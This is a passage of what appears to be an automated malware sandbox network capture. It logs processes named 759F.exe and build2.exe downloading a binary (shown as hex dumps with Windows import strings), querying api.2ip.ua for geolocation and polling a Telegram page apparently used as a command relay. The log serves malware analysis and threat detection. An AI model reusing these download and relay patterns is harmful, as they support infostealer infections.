e8 4d 29 33 e7 19 36 60 02 e6 3c 60 48 d1 46 cf 0d 3c fb 8f 5e b4 a7 17 2f df 27 43 43 23 33 e2 83 b7 25 Data Ascii: 2000/\|3h0FK/T\|:%p"Cj'hcQS8^%V(+\|8)#9QQ.O"!GI'L$V\|1l.2(JA5>&l)P4pGO?b{AQI[%Kx}v5XyA-z;U~M)36`<`HF<^/'CC#3%
2023-06-21 02:27:43 UTC	106	IN	Data Raw: 86 72 9c e9 c7 b0 Data Ascii: r
2023-06-21 02:27:44 UTC	106	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	106	IN	Data Raw: 32 30 30 30 0d 0a 97 8c 85 26 28 32 54 84 ab 03 3e c2 08 f0 1e 2f 20 20 93 00 2e fb 44 88 ca d9 e0 02 0d da 6c e4 b5 8b 8e f3 a0 99 62 c5 5d a9 76 19 76 82 d5 04 ac 24 e3 19 e6 95 ae b9 4b 62 2f 2a fd f5 74 5e 58 46 50 42 48 00 49 84 4c 78 4a 07 5c 2e 5b 02 a1 64 d1 b9 ac 19 1c 31 59 d5 f0 eb 52 50 bf 03 35 35 b5 eb da 14 51 ce 09 57 8b d1 cb 2c 88 8a be 25 bf 82 d9 f6 49 b5 fc 89 cd 61 2b e9 f4 c9 2a 42 e9 6a d9 2e 2d 4f 3f b6 6f 08 c4 0d 6a 53 0f 26 01 0f 6b 12 b5 4f 4d fc e5 f4 36 70 0c 1f 58 0d 4e 45 96 00 83 ee 10 40 ed 4a b4 86 af 4a 5a ab 7c 28 cf 71 62 61 63 c9 e4 ca 1b 48 83 29 ce ee db f3 89 ba a0 05 dd 41 fb 38 7c fd fb 71 26 96 dc e4 25 e6 5c 2d b1 5d 29 50 fb 1c 1d 84 e9 a0 12 78 22 af 18 b9 ff 50 8b 8e 73 86 fe d6 d8 9c 28 05 92 1d 0c fe 93 Data Ascii: 2000&(2T>/ .Dlb]vv$Kb/t^XFPBHILxJ\.[d1YRP55QW,%Ia+Bj.-O?ojS&kOM6pXNE@JJZ\|(qbacH)A8\|q&%\-])Px"Ps(
2023-06-21 02:27:44 UTC	114	IN	Data Raw: 51 52 a0 bf e8 91 Data Ascii: QR
2023-06-21 02:27:44 UTC	114	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	114	IN	Data Raw: 32 30 30 30 0d 0a 55 d7 62 74 2b 52 b3 a5 45 35 4e 02 0e 98 97 62 0f aa 66 48 92 ca 3c 76 15 74 7f f3 9e b1 c3 2e 19 dd 13 9c 36 7c d6 fb d8 6d 64 34 48 28 4c 90 f2 ad e2 25 e3 3a 44 c0 96 38 cf c3 3e 22 83 54 b5 1d 16 10 8d 34 81 d2 44 75 de 8c e4 21 c7 3e 71 d3 e9 8b ba f8 82 46 4c 90 58 55 78 71 12 80 64 79 cd c6 92 c2 4d 76 3b 4f 0e fc 1e 8e 45 17 cf 77 5b 1c a2 ca aa 13 55 6f f2 5f 55 c0 52 62 49 fe 75 75 d8 b6 17 1e 0d 99 d4 15 44 ab f8 ae b0 c9 2f 3d d4 76 73 94 bd b7 16 0a 25 a2 b3 b6 15 b0 60 94 63 54 38 09 13 e2 21 a5 92 1f 13 a4 99 b1 2e d5 fa 57 aa 39 4b 57 78 8b ab 1d bf 11 35 97 dc 25 cf 36 e0 76 eb 38 4d d8 4b 02 e1 40 00 bd 11 c1 d1 18 2b c3 a3 22 db dc 26 5d 71 6d 1c 61 55 2a 0d f6 62 b4 e9 d6 3e 7d a0 8a ef e4 bc 88 cc ef 15 18 f6 f2 08 Data Ascii: 2000Ubt+RE5NbfH<vt.6\|md4H(L%:D8>"T4Du!>qFLXUxqdyMv;OEw[Uo_URbIuuD/=vs%`cT8!.W9KWx5%6v8MK@+"&]qmaU*b>}
2023-06-21 02:27:44 UTC	122	IN	Data Raw: 00 56 9b 03 3b f7 Data Ascii: V;
2023-06-21 02:27:44 UTC	122	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	122	IN	Data Raw: 31 66 66 38 0d 0a 85 87 a5 91 8f 30 54 00 1d 44 91 36 87 31 83 92 b4 6a fb 62 5f d2 b9 f3 a6 66 19 74 86 71 a5 c1 10 4d c7 54 ca b9 b1 ca 54 af 7c ca e6 91 9e 34 22 99 3e 19 91 83 03 bc c4 15 29 da d7 09 11 e8 c9 87 dc c0 8f 09 2b 2c c6 94 34 6d 70 35 87 c7 0b c2 ab ea f6 bd 24 1f 8e 81 c1 16 29 1d c3 a9 dc 1b 0d 13 9c e7 18 8d 1b 84 a7 b9 c7 df 97 fc d3 0e ef 3f 89 44 9b 8b 7f 8a ca 0b a3 4b 2f 97 d7 18 f9 b3 12 f0 a2 64 e4 42 b4 b8 d3 a1 d1 c8 7d c0 ae 57 9b 5e 89 d4 83 c0 30 a6 eb 67 73 5e 8e 47 1d 33 da 4f 94 01 5f 8f ca c0 54 84 f9 f9 0c 61 17 12 68 d9 44 07 b3 51 0d 81 9e f5 a4 cb df ee 03 e2 5f 8b 30 39 be 9a 91 a1 dd 0f 67 fc 7e 30 4d d4 88 d3 d5 d9 a3 34 f1 3e 8c f5 bd ca 8f 6c 6d 77 4f cf aa bf 1a 36 9f 6f 73 c6 fd 2f 51 e9 8d 55 23 02 5a 9a be Data Ascii: 1ff80TD61jb_ftqMTT\|4">)+,4mp5$)?DK/dB}W^0gs^G3O_TahDQ_09g~0M4>lmwO6os/QU#Z
2023-06-21 02:27:44 UTC	130	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:27:44 UTC	130	IN	Data Raw: 6b 6e 3d da 83 89 a9 57 0c b4 16 f2 ba ec 98 4d e4 95 8e 53 6d 03 61 f0 b5 6c 7c 0a 41 b1 65 2a 2a a4 91 e3 3d 64 68 d5 db 09 fe 2d cf e6 2f 43 58 2d 2e a8 39 62 b0 02 a7 67 0a 62 96 49 97 4a 7c 5a 71 61 a6 c6 16 5e b8 37 e2 a9 d4 df 99 a3 9e d1 57 fc 0a 24 c2 9e e7 9e a2 55 e8 4c 10 55 d7 d4 59 2f 9a 6d 68 14 c5 64 49 71 b7 42 2b c1 4c b6 c7 b3 8f ec d9 26 a7 8f 69 5d b7 67 74 d1 a4 72 a2 94 b6 0b 2b cd 1f 66 73 66 d5 28 5f cf b8 45 9b b9 2d 7e 36 1f ad 5b 4a 9e 36 48 a4 12 bb 58 4b 46 57 2e ea a8 10 e1 a1 fd 78 48 c0 eb 02 e4 21 0a b2 73 67 f5 e7 2f e7 48 86 a0 f2 db 39 d2 70 ac 3c db a3 95 59 2c c0 9c dc 7c 62 12 a5 ae c8 fa c7 99 a2 40 a4 ed 68 4b 53 bd 4d 2d cb 8f cf 55 2d 9f 6b 25 18 8a 93 42 4f 96 15 d6 3c 1e 13 0a 6d 21 15 3f 18 ee 9e 78 f6 3d 52 Data Ascii: kn=WMSmal\|Ae**=dh-/CX-.9bgbIJ\|Zqa^7W$ULUY/mhdIqB+L&i]gtr+fsf(_E-~6[J6HXKFW.xH!sg/H9p<Y,\|b@hKSM-U-k%BO<m!?x=R
2023-06-21 02:27:44 UTC	138	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	138	IN	Data Raw: 32 30 30 30 0d 0a a8 81 05 57 0a dd a6 d7 17 42 35 34 30 42 19 23 3c 1c b4 e2 91 20 29 3d cf 41 ad 70 f7 85 51 0d 4e e9 ea 26 ab ca 27 a3 c4 e8 46 4d 04 8d 81 18 04 46 9f 12 b1 10 d8 c8 a9 0e 4d 09 fe 5f d7 28 40 ae 2d 25 c3 d1 03 b8 91 b1 c1 ae a3 ad 47 65 db 67 0c b7 4c 3c 6d b1 84 8e 5e 17 dd e2 8e fc 71 08 89 17 a4 9c 79 c3 c5 4d 4c 21 18 37 67 81 21 53 ad bd 09 78 8e 23 75 4c fb 42 d7 dd 07 0b a6 8a 8b 60 19 28 97 4f 1c 22 2c 27 ac f4 d5 8b 8f e2 93 67 f5 c9 32 a3 1e 63 99 79 07 d7 51 12 b9 33 a2 26 ce 4a 3e 9f 77 5f 2d 73 0a 06 67 0a de 5f 68 21 b4 f3 d0 80 f7 ed 5c 49 88 18 a3 01 e0 ab 09 12 d9 d4 f3 29 dd 62 10 11 37 04 17 79 9c 67 69 95 3b 00 b6 03 b3 c7 28 84 ba 2e 4f ee 61 c5 46 e4 9e 49 ae 30 51 6a 94 b6 d8 ab ed 84 1c 6b ba ae 19 dd c4 04 21 Data Ascii: 2000WB540B#< )=ApQN&'FMFM_(@-%GegL<m^qyML!7g!Sx#uLB`(O",'g2cyQ3&J>w_-sg_h!\I)b7ygi;(.OaFI0Qjk!
2023-06-21 02:27:44 UTC	146	IN	Data Raw: 70 64 61 74 65 52 Data Ascii: pdateR
2023-06-21 02:27:44 UTC	146	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	146	IN	Data Raw: 32 30 30 30 0d 0a 65 73 6f 75 72 63 65 41 00 00 49 03 50 75 72 67 65 43 6f 6d 6d 00 a7 01 47 65 74 43 75 72 72 65 6e 74 44 69 72 65 63 74 6f 72 79 41 00 00 60 03 52 65 61 64 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 57 00 2a 01 46 69 6e 64 46 69 72 73 74 56 6f 6c 75 6d 65 57 00 00 aa 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 4b 45 52 4e 45 4c 33 32 2e 64 6c 6c 00 00 69 02 53 65 74 43 61 72 65 74 50 6f 73 00 6d 01 47 65 74 53 79 73 43 6f 6c 6f 72 42 72 75 73 68 00 00 e1 01 4c 6f 61 64 4d 65 6e 75 57 00 38 00 43 68 61 72 55 70 70 65 72 42 75 66 66 41 00 00 34 00 43 68 61 72 54 6f 4f 65 6d 42 75 66 66 41 00 00 55 53 45 52 33 32 2e 64 6c 6c 00 00 ed 01 47 65 74 50 6f 6c 79 46 69 6c 6c 4d 6f 64 65 00 47 44 49 33 32 2e 64 6c 6c 00 29 02 52 65 61 Data Ascii: 2000esourceAIPurgeCommGetCurrentDirectoryA`ReadConsoleInputW*FindFirstVolumeWGetCurrentProcessIdKERNEL32.dlliSetCaretPosmGetSysColorBrushLoadMenuW8CharUpperBuffA4CharToOemBuffAUSER32.dllGetPolyFillModeGDI32.dll)Rea
2023-06-21 02:27:44 UTC	154	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:27:44 UTC	154	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	154	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:27:44 UTC	162	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:27:44 UTC	162	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	162	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:27:44 UTC	170	IN	Data Raw: 00 7f 00 00 00 7f Data Ascii:
2023-06-21 02:27:44 UTC	170	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	170	IN	Data Raw: 32 30 30 30 0d 0a 80 00 00 ff 80 00 00 ff c0 00 01 ff e0 00 03 ff f0 00 03 ff f0 00 07 ff e0 00 1f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 7f ff f0 00 7f ff fc 01 ff ff ff ff ff ff ff ff ff ff 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7d 7b 00 7a 82 80 00 80 81 7d 00 79 84 7a 00 80 7e 80 00 7b 7f 7f 00 83 7f 7e 00 7b 83 85 00 7a 7d 7c 00 7c 7e 83 00 84 7f 83 00 7b 80 82 00 7c 7d 83 00 7f 80 7c 00 80 79 7b 00 79 7e 7b 00 7c 7f 81 00 83 83 7f 00 7d 7c 7a 00 7e 81 7e 00 79 7c 81 00 80 7d 7e 00 80 7b 7f 00 84 82 84 00 7c 85 7d 00 7e 84 7f 00 7c 80 83 00 7d 7d 83 00 81 82 7a 00 7e 7d 82 00 80 7a 7d 00 7d 84 7e 00 7b 7c 7f 00 81 84 7b 00 81 7c 82 00 7c 7e 84 00 7d Data Ascii: 2000????( }{z}yz~{~{z}\|\|~{\|}\|y{y~{\|}\|z~~y\|}~{\|}~\|}}z~}z}}~{\|{\|\|~}
2023-06-21 02:27:44 UTC	178	IN	Data Raw: 81 83 80 83 81 85 Data Ascii:
2023-06-21 02:27:44 UTC	178	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	178	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7e 83 7d 81 82 82 7f 7d 83 80 80 7c 7c 82 82 7d 83 7f 7f 7d 7e 7f 81 81 7a 82 80 83 80 7d 84 7b 7e 83 80 83 7c 7f 7d 85 80 82 83 7b 82 7d 7f 82 7f 83 7a 7f 7f 83 84 82 7d 7b 82 80 84 7e 7f 7f 7c 7f 7c 7e 7e 83 83 86 82 7f 7b 81 7f 80 81 82 7e 7f 7e 83 84 84 7a 7e 7d 82 7c 80 7f 82 7f 7f 7c 83 84 7e 7f 82 84 84 7d 83 7e 84 7b 7f 7b 7b 84 7f 7e 7c 7b 7f 81 7b 80 7f 80 7b 7a 81 7e 7c 80 79 81 81 7a 7d 7d 82 7c 81 7c 7f 82 80 7c 82 79 7e 83 84 81 7d 81 7b 82 83 7c 7d 84 80 7f 80 7e 7b 7d 7f 7b 85 7c 81 81 7d 80 81 82 83 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 83 7b 7d 80 81 83 7b 7d 79 85 81 81 7f 82 7f 79 7f 7c 7a 7f 85 7f 82 84 80 7e 80 81 7a 80 82 7f 82 81 83 7f Data Ascii: 2000~~}}\|\|}}~z}{~\|}{}z}{~\|\|~~{~~z~}\|\|~}~{{{~\|{{{z~\|yz}}\|\|\|y~}{\|}~{}{\|}{}{}yy\|z~z
2023-06-21 02:27:44 UTC	186	IN	Data Raw: 7c 83 7f 80 83 7f Data Ascii: \|
2023-06-21 02:27:44 UTC	186	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	186	IN	Data Raw: 31 66 66 38 0d 0a 83 79 80 7b 84 85 81 7a 83 81 7c 84 83 83 7d 82 80 7e 82 7d 81 85 7e 7d 7f 84 7d 82 82 7f 83 81 7f 80 81 82 7c 83 81 80 84 7f 7f 81 7f 7c 80 82 85 80 83 7d 83 7c 7b 86 00 00 00 00 00 00 00 00 80 85 7b 82 85 85 81 82 7f 7e 80 7c 80 82 83 84 80 83 7e 7b 7f 7e 7e 80 82 83 84 7a 7f 83 86 7e 82 84 79 7c 7b 7c 7d 85 80 7d 7c 80 7c 7f 7a 80 79 7f 7d 7c 82 80 82 7e 80 7d 81 84 7c 7d 7a 84 7c 83 7f 84 7e 7b 85 81 82 7a 7b 82 7e 84 82 7c 83 7b 7a 7d 80 80 7c 83 00 00 00 00 00 00 00 00 81 7c 7b 81 7b 7c 80 85 81 7a 81 7d 7b 7e 7a 81 7e 82 82 7b 7b 7f 7d 7d 81 7d 83 83 85 81 83 7f 83 83 7b 7a 7f 7f 7e 7b 81 81 7e 7c 7e 80 82 81 80 84 7f 7d 83 80 7e 80 7c 81 7f 82 83 79 81 7c 7e 83 83 84 81 85 82 7d 82 7c 81 83 80 7f 82 82 83 7c 82 81 7f 7f 81 7f 00 Data Ascii: 1ff8y{z\|}~}~}}\|\|}\|{{~\|~{~~z~y\|{\|}}\|\|zy}\|~}\|}z\|~{z{~\|{z}\|\|{{\|z}{~z~{{}}}{z~{~\|~}~\|y\|~}\|\|
2023-06-21 02:27:44 UTC	194	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:27:44 UTC	194	IN	Data Raw: 68 00 65 00 63 00 61 00 78 00 75 00 72 00 20 00 79 00 75 00 76 00 65 00 63 00 65 00 70 00 20 00 78 00 69 00 6c 00 6f 00 6e 00 75 00 79 00 61 00 77 00 75 00 20 00 64 00 69 00 68 00 75 00 66 00 6f 00 77 00 69 00 73 00 69 00 78 00 20 00 76 00 75 00 68 00 75 00 6a 00 6f 00 20 00 72 00 65 00 68 00 61 00 6d 00 75 00 78 00 20 00 6e 00 75 00 63 00 75 00 79 00 69 00 6b 00 69 00 6c 00 65 00 20 00 79 00 75 00 73 00 69 00 6b 00 69 00 70 00 75 00 6c 00 69 00 79 00 6f 00 6d 00 6f 00 20 00 67 00 75 00 62 00 61 00 66 00 75 00 63 00 65 00 6e 00 69 00 77 00 75 00 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: hecaxur yuvecep xilonuyawu dihufowisix vuhujo rehamux nucuyikile yusikipuliyomo gubafuceniwum
2023-06-21 02:27:44 UTC	202	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:27:44 UTC	202	IN	Data Raw: 34 31 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 418

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49762	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:23 UTC	1139	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:28:23 UTC	1139	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:28:23 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:28:23 UTC	1140	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49771	149.154.167.99	443	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:27 UTC	1140	OUT	GET /headlist HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me Cookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830
2023-06-21 02:28:27 UTC	1141	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 21 Jun 2023 02:28:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12354 Connection: close Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-06-21 02:28:27 UTC	1141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 65 61 64 6c 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @headlist</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49779	149.154.167.99	443	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:37 UTC	1153	OUT	GET /headlist HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me Cookie: stel_ssid=e96a9d9fbfb9d3de5c_4986863142029452830
2023-06-21 02:28:37 UTC	1153	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 21 Jun 2023 02:28:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12353 Connection: close Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-06-21 02:28:37 UTC	1153	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 65 61 64 6c 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @headlist</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49708	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:44 UTC	204	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:44 UTC	204	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:44 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:44 UTC	204	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
